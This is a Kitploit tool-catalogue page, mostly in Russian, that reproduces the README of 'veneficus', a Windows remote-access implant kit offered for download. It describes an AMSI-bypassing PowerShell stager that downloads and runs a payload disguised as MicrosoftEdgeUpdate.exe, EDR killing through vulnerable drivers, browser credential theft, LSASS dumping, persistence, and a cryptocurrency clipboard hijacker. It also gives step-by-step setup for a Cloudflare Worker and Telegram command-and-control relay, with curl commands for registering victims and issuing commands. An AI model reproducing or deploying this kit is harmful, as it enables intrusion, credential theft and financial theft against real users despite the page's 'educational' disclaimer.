Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
veneficus — Суперэлитный end-to-end имплант 0day. Полная kill-chain. Эксплуатация, повышение привилегий, пивотинг, отравление, закрепление. | Kitploit
Инструменты/GitHubGitHub/abraxas/veneficus
Повышение привилегийМеханизмы персистентностиОбход IDS/IPSЛатеральное перемещениеЭксфильтрация данныхПост-эксплуатацияАнализ вредоносных программКомандование и УправлениеRed TeamingРазработка Полезной НагрузкиТроян Удаленного Доступа
2181 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubabraxas/veneficus

veneficus

Суперэлитный end-to-end имплант 0day. Полная kill-chain. Эксплуатация, повышение привилегий, пивотинг, отравление, закрепление.

Репозиторий

ABRAXAS LABS — analyze · reverse · disclose

@abraxas_null · [email protected] · abraxaslabs.tech · github.com/abraxas/veneficus
Credit: @YoSoth0

Veneficus Mini v3.0

Набор импланта для Windows 10/11 x64: PowerShell-стager, Rust PE и Cloudflare Worker, который оповещает оператора в Telegram.

Stager (resources/loader.ps1) предназначен для подавления AMSI в текущем процессе PowerShell, загрузки импланта с маршрута /beacon Worker'а и его запуска как %TEMP%\MicrosoftEdgeUpdate.exe. Затем PE оценивает хост на наличие артефактов песочницы/аналитика. Высокая оценка приводит к уничтожению бинарника; средняя оценка включает «безопасный режим» (только фингерпринт); низкая оценка запускает полный стек — патчи AMSI/ETW, BYOVD-пул против именованных процессов EDR, кража учётных данных браузера, цепочка дампа LSASS, персистентность через WMI/запланированные задачи/Run, локальный SOCKS5-прокси, локальный HVNC/RFB-листенер и клиппер буфера обмена для криптоадресов. Цикл HTTPS с джиттером отправляет beacon-запросы и опрашивает небольшой набор команд (/status, /proxy_on, /self_destruct, /re_infect, /sleep, переключатели безопасного режима). Эксфильтрация выполняется с помощью AES-256-GCM с HMAC, ключ которого основан на UUID, зашитом во время компиляции; Worker должен пересылать шифротекст, не храня ключ.

Этот репозиторий опубликован для образования и анализа. Пофайловый разбор того, что реализовано, а что является заглушкой, находится в VENEFICUS_MINI_v3_DEEP_ANALYSIS.md.

Только для образовательных целей. 2026 All rights reversed.


Архитектура

VICTIM MACHINE
  loader.ps1 (AMSI/ETW bypass → download → execute)
    └── veneficus_mini.exe
          ├── Environment assessment (sandbox/VM/analyst detection)
          ├── Stealth: syscall bypass chain, lacuna stack-spoof, DKOM, AMSI/ETW patch
          ├── BYOVD: kill EDR processes (K7RKScan, ThrottleStop, BdApi, TrueSight, wsftprm, RTCore64)
          ├── Payload: creds, cookies, LSASS dump, device fingerprint
          ├── Persistence: WMI / Scheduled Task / Registry (three-way fallback)
          ├── SOCKS5 proxy (127.0.0.1:1080 by default, configurable)
          ├── HVNC (127.0.0.1:5900 by default, configurable)
          ├── Clipper: crypto address hijacking (BTC, ETH, LTC, XMR, DOGE, SOL, XRP, BNB, USDT)
          └── C2 loop: AES-GCM encrypted poll every 10 ± 3s (safe mode: 60 ± 18s)
                ↕ HTTPS
CLOUDFLARE WORKER
  /beacon   → implant download
  /exfil    → receive encrypted data → forward ciphertext to Telegram
  /commands → return queued commands (one-time queue)
  /config   → return operator config blob
  /admin    → queue commands  (requires X-Admin-Key)
  /register → register UUID   (requires X-Admin-Key)
  /unregister → revoke UUID   (requires X-Admin-Key)
  /listing  → list all UUIDs (requires X-Admin-Key)
  /set_config → push config  (requires X-Admin-Key)
                ↓
TELEGRAM BOT
  Receives: ciphertext + nonce + HMAC (operator decrypts offline)

Предварительные требования

КомпонентКак установить
Rust + cargocurl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Цель кросс-компиляции для Windowsrustup target add x86_64-pc-windows-gnu
Кросс-линкер MinGWsudo apt install mingw-w64
Wrangler (CF Worker CLI)npm install -g wrangler

Настройка

1. Cloudflare Worker

wrangler login
wrangler init veneficus-relay
# Replace worker.js with cloudflare/worker.js

wrangler secret put TELEGRAM_TOKEN     # from @BotFather
wrangler secret put TELEGRAM_CHAT_ID   # your chat/group ID
wrangler secret put ADMIN_KEY          # random 32-char secret

wrangler kv:namespace create "UUID_KV"
wrangler kv:namespace create "COMMANDS_KV"
wrangler kv:namespace create "CONFIG_KV"

# Add KV bindings to wrangler.toml:
#   [[kv_namespaces]]
#   binding = "UUID_KV"
#   id = "<uuid_kv_id>"
#   (repeat for COMMANDS_KV, CONFIG_KV)

wrangler deploy

2. Генерация Relay URL

import base64
url = b"https://your-worker.workers.dev"
key = 0xAF
enc = bytes([b ^ key for b in url])
print(base64.b64encode(enc).decode())   # → set as RELAY_URL_BYTES

3. Сборка

RELAY_URL_BYTES="<output_above>" \
BYOVD_DRIVER_DIR="./drivers" \
TOOLS_DIR="./tools" \
cargo build --release --target x86_64-pc-windows-gnu

Поместите уязвимые .sys-файлы драйверов в drivers/, а бинарники инструментов в tools/ перед сборкой.

4. Регистрация UUID импланта

Прочитайте UUID из бинарника (зашит во время сборки):

strings target/x86_64-pc-windows-gnu/release/veneficus_mini.exe | grep -E "[0-9a-f]{8}-[0-9a-f]{4}"

Зарегистрируйте через admin API:

curl -X POST https://your-worker.workers.dev/register \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","note":"op_blackbird_host01"}'

5. Отправка конфигурации оператора (адреса клиппера и т. д.)

curl -X POST https://your-worker.workers.dev/set_config \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "implant_uuid": "global",
    "config": {
      "clipper_addresses": {
        "bitcoin":  "bc1qyourwallethere",
        "ethereum": "0xYOURWALLETHERE"
      },
      "reinfect_url": "https://your-worker.workers.dev/beacon"
    }
  }'

Команды C2

Отправляются через endpoint /admin:

curl -X POST https://your-worker.workers.dev/admin \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","command":"/status"}'
КомандаДействие
/self_destruct3-проходное затирание + очистка журнала событий + выход
/re_infectЗагрузка новой полезной нагрузки из reinfect_url в конфиге, замена себя
/statusОтправка PID, состояния прокси, безопасного режима, UUID обратно в C2
/proxy_onВключить SOCKS5-прокси
/proxy_offОтключить SOCKS5-прокси
/exit_safeВыйти из безопасного режима, возобновить полную работу
/enter_safeВойти в безопасный режим (только фингерпринт)
/sleep <secs>Переопределить базовый интервал опроса C2

Цепочки отката

МодульЦепочка (слева = пробуется первым)
BYOVDK7RKScan → BdApiUtil64 → TrueSight → ThrottleStop → STProcessMonitor → wsftprm → RTCore64 → capcom → disable blocklist
LSASSMiniDumpWriteDump (native) → WDigest patch → LSA Whisperer → DumpGuard → PPL bypass (RTCore64)
NTLMPrinterBug → PetitPotam → cross-protocol relay (HTTP→LDAP) → CVE-2025-33073 → MSSQL relay
SyscallsTartarus Gate → Halo's Gate → ntdll unhook → indirect → standard WinAPI
DKOMEPROCESS unlink → PspChained enumeration → EDR callback unregister
PersistenceWMI subscription → Scheduled Task → HKLM Run key

Структура каталогов

Скачать инструмент